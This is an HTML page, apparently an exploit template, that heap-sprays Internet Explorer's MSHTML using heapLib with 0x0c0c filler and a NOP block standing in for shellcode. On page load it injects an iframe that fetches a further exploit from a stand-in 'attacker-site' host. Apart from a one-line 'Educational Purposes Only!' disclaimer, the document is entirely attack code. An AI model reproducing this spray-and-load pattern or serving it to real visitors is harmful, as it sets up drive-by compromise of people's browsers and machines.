<html> <head> <title>MSHTML.DLL Heap Spray</title> <script language="javascript"> var heap_obj = new heapLib.ie(0x20000); var code = unescape("%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090%u9090%u9090%u9090"); var nops = unescape("%u0c0c%u0c0c"); while (nops.length <= 0x80000) nops += nops; var shellcode = nops.substring(0, 0x80000 - code.length); shellcode += code; var block = shellcode; while (block.length <= 0x40000) block += block; var memory = new Array(); for (var i=0; i<600; i++) { memory[i] = block + heap_obj.alloc(block); } </script> </head> <body onload="document.write('<iframe src=https://www.attacker-site/exploit></iframe>');"> </body> </html>



Educational Purposes Only!